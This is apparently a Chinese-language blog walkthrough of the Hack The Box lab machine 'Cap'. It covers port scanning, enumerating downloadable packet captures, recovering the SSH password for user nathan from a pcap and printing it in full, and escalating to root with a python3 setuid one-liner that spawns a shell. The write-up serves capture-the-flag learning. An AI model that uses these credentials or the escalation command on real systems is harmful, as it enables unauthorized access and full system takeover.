Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-[cap]

0x00.简述

0x01.信息收集

可以看到开放了21、21、80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
┌──(root💀kali)-[~/htb/cap]
└─# ftp anonymous@10.10.10.245 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-14 00:34 EDT
Nmap scan report for 10.10.10.245
Host is up (0.38s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 193
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid Request Line &#x27;Invalid HTTP request line: &#x27;&#x27;&#x27;
| </body>
| </html>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Wed, 14 Jul 2021 04:39:13 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Wed, 14 Jul 2021 04:39:14 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, HEAD, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1117/tcp filtered ardus-mtrns
3371/tcp filtered satvid-datalnk
5822/tcp filtered unknown
5952/tcp filtered unknown
8652/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.91%I=7%D=7/14%Time=60EE6988%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1059,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20
SF:Wed,\x2014\x20Jul\x202021\x2004:39:13\x20GMT\r\nConnection:\x20close\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20193
SF:86\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\
SF:n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x2
SF:0<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\
SF:x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\
SF:x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=
SF:1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image
SF:/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<
SF:link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">
SF:\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/fon
SF:t-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=
SF:\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.
SF:css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/c
SF:ss/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOption
SF:s,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Wed,\x2
SF:014\x20Jul\x202021\x2004:39:14\x20GMT\r\nConnection:\x20close\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20HEAD,\x20OP
SF:TIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text
SF:/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20
SF:\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\
SF:n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invali
SF:d\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP
SF:/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(GenericLines,11E,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type
SF::\x20text/html\r\nContent-Length:\x20193\r\n\r\n<html>\n\x20\x20<head>\
SF:n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x
SF:20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\
SF:x20Invalid\x20Request\x20Line\x20&#x27;Invalid\x20HTTP\x20request\x20li
SF:ne:\x20&#x27;&#x27;&#x27;\n\x20\x20</body>\n</html>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.16 seconds

0x02.FTP匿名访问

由于开放了21端口,所以尝试匿名登入,可以看到不允许匿名登入

1
2
3
4
┌──(root💀kali)-[~/htb/cap]
└─# ftp anonymous@10.10.10.245 1 ⚙
ftp: anonymous@10.10.10.245: Name or service not known
ftp>

0x03.访问80端口

手动爬虫发现这是一个网络设备管理面板

多次点击发现url也会发生变化,且可以下载数据包

扫描data目录,访问发现一共有6个有效链接,分别是0、1、2、3、4、5,全部下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
──(root💀kali)-[~/htb/cap]
└─# dirb http://10.10.10.245/data/ 1 ⚙
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 14 01:10:25 2021
URL_BASE: http://10.10.10.245/data/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.245/data/ ----
+ http://10.10.10.245/data/0 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/00 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/01 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/02 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/03 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/04 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/05 (CODE:200|SIZE:17147)
+ http://10.10.10.245/data/1 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/2 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/3 (CODE:200|SIZE:17144)
+ http://10.10.10.245/data/4 (CODE:200|SIZE:17144) + http://10.10.10.245/data/5 (CODE:200|SIZE:17147)

0x04.数据包分析

6个数据包中只有0.pcap包含有用信息,得到用户与密码

user:nathan

pass:Buck3tH4TF0RM3!

登入得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~]
└─# ssh nathan@10.10.10.245 1 ⚙
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jul 14 06:11:21 UTC 2021

System load: 0.04
Usage of /: 35.0% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 228
Users logged in: 0
IPv4 address for eth0: 10.10.10.245
IPv6 address for eth0: dead:beef::250:56ff:feb9:dda9

=> There are 4 zombie processes.

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

nathan@cap:~$ ls
user.txt
nathan@cap:~$ cat user.txt
*************************
nathan@cap:~$

0x05.提权

1
2
3
4
5
6
7
8
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# /bin/bash
root@cap:~# cd /root
root@cap:/root# ls
root.txt snap
root@cap:/root# cat root.txt
****************************
root@cap:/root#
-------------纸短情长下次再见-------------